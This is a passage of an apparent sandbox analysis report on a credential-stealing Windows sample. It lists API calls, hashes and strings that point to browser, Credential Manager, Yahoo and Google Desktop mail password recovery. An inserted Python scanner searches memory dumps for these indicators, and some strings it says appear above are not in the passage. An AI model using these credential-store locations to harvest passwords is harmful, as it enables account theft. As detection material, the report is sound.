                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                  APIs
                  • memset.MSVCRT ref: 0040C02D
                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2726666094-3614832568
                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                  • OpenClipboard.USER32(?), ref: 0040C1B1
                  • GetLastError.KERNEL32 ref: 0040C1CA
                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                  • String ID:
                  • API String ID: 2014771361-0
                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                  APIs
                  • memcmp.MSVCRT ref: 00406151
                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                  • memcmp.MSVCRT ref: 0040617C
                  • memcmp.MSVCRT ref: 004061A4
                  • memcpy.MSVCRT ref: 004061C1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: global-salt$password-check
                  • API String ID: 231171946-3927197501
                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
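The String ID rows in the entries above (NSS key-database record names "global-salt" and "password-check", the POP3_* values, "*.oeaccount", "Microsoft_WinInet", "%s@gmail.com") are the concrete artifacts behind the report's mail- and browser-credential-theft verdicts, and they are the kind of evidence a responder turns into a memory-dump check. The following scanner is an added example, not code from the Joe Sandbox report or from the sample; it copies those strings from the rows above, searches a dump for both their ASCII and UTF-16LE forms (the report does not state which encoding each string has, and Win32 code mixes A and W APIs), and applies a YARA-style "N of them" threshold. The dump it runs on is constructed inline for illustration.

```python
"""
Added example (not part of the Joe Sandbox report): scan a memory dump for
the credential-recovery indicator strings listed in the report, in both
narrow (ASCII) and wide (UTF-16LE) encodings, and apply a simple
"N distinct indicators" condition. Threshold and sample dump are
illustrative assumptions, not values from the report.
"""
from __future__ import annotations

# Indicator strings copied from the "String ID" rows of the entries above.
# The report does not say which are narrow or wide in the dump, so every
# string is searched in both encodings.
INDICATORS = (
    b"global-salt",        # NSS (Firefox) key database record name
    b"password-check",     # NSS master-password check record name
    b"POP3_credentials",
    b"POP3_host",
    b"POP3_name",
    b"*.oeaccount",        # Windows Live Mail account file pattern
    b"Microsoft_WinInet",  # Credential Manager target prefix seen with CredEnumerateW
    b"%s@gmail.com",
    b"SavePasswordText",
)


def encodings(s: bytes) -> tuple[bytes, bytes]:
    """Return the (ascii, utf16le) byte patterns for one indicator."""
    return s, s.decode("ascii").encode("utf-16-le")


def find_indicators(dump: bytes) -> dict[bytes, list[tuple[int, str]]]:
    """Map each indicator found in dump to its (offset, encoding) hits."""
    hits: dict[bytes, list[tuple[int, str]]] = {}
    for ind in INDICATORS:
        for enc_name, pat in zip(("ascii", "utf16le"), encodings(ind)):
            start = 0
            while (pos := dump.find(pat, start)) != -1:
                hits.setdefault(ind, []).append((pos, enc_name))
                start = pos + 1  # keep going: a string may occur more than once
    return hits


def is_suspicious(dump: bytes, threshold: int = 3) -> bool:
    """YARA-style 'threshold of them': count distinct indicators, not raw hits."""
    return len(find_indicators(dump)) >= threshold


# Constructed sample dump (not from the report): a few indicators in mixed
# encodings, padded with unrelated bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"global-salt\x00"
    + b"password-check\x00"
    + "Microsoft_WinInet".encode("utf-16-le")
    + b"\x90" * 32
    + b"unrelated text\x00"
)

if __name__ == "__main__":
    for ind, where in find_indicators(SAMPLE_DUMP).items():
        print(ind.decode(), where)
    print("suspicious:", is_suspicious(SAMPLE_DUMP))
```

Counting distinct indicators rather than total matches keeps a dump that merely repeats one benign string (for example an e-mail client's own resources containing "%s@gmail.com") from crossing the threshold; in practice the same list would be expressed as a YARA rule with `ascii wide` modifiers and run against the process dump the report names.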
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                  • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004016A3
                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                  • BeginPaint.USER32(?,?), ref: 004016D7
                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                  • EndPaint.USER32(?,?), ref: 004016F3
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                  • String ID:
                  • API String ID: 19018683-0
                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                  APIs
                  • memset.MSVCRT ref: 0040644F
                  • memcpy.MSVCRT ref: 00406462
                  • memcpy.MSVCRT ref: 00406475
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                  • memcpy.MSVCRT ref: 004064B9
                  • memcpy.MSVCRT ref: 004064CC
                  • memcpy.MSVCRT ref: 004064F9
                  • memcpy.MSVCRT ref: 0040650E
                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                  APIs
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                  • strlen.MSVCRT ref: 0040F7BE
                  • _mbscpy.MSVCRT ref: 0040F7CF
                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Passport.Net\*
                  • API String ID: 2329438634-3671122194
                  • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                  • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                  APIs
                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                  • memset.MSVCRT ref: 0040330B
                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                  • strchr.MSVCRT ref: 0040335A
                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                  • strlen.MSVCRT ref: 0040339C
                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                  • String ID: Personalities
                  • API String ID: 2103853322-4287407858
                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                  APIs
                  • memset.MSVCRT ref: 00444573
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValuememset
                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                  • API String ID: 1830152886-1703613266
                  • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                  • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: H
                  • API String ID: 2221118986-2852464175
                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                  • API String ID: 3510742995-3170954634
                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: winWrite1$winWrite2
                  • API String ID: 438689982-3457389245
                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: winRead
                  • API String ID: 1297977491-2759563040
                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                  APIs
                  • GetParent.USER32(?), ref: 004090C2
                  • GetWindowRect.USER32(?,?), ref: 004090CF
                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$_mbscpy
                  • String ID: smtp
                  • API String ID: 2625860049-60245459
                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                  APIs
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408258
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                  Strings
                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Close$EnumOpenmemset
                  • String ID: Software\Google\Google Desktop\Mailboxes
                  • API String ID: 2255314230-2212045309
                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                  APIs
                  • memset.MSVCRT ref: 0040C28C
                  • SetFocus.USER32(?,?), ref: 0040C314
                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FocusMessagePostmemset
                  • String ID: S_@$l
                  • API String ID: 3436799508-4018740455
                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                  APIs
                  • memset.MSVCRT ref: 004092C0
                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                  • _mbscpy.MSVCRT ref: 004092FC
                  Strings
                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscpymemset
                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                  • API String ID: 408644273-3424043681
                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy
                  • String ID: C^@$X$ini
                  • API String ID: 714388716-917056472
                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                  • String ID: MS Sans Serif
                  • API String ID: 3492281209-168460110
                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_strcmpimemset
                  • String ID: edit
                  • API String ID: 275601554-2167791130
                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_mbscat
                  • String ID: 3CD
                  • API String ID: 3951308622-1938365332
                  • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                  • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: rows deleted
                  • API String ID: 2221118986-571615504
                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
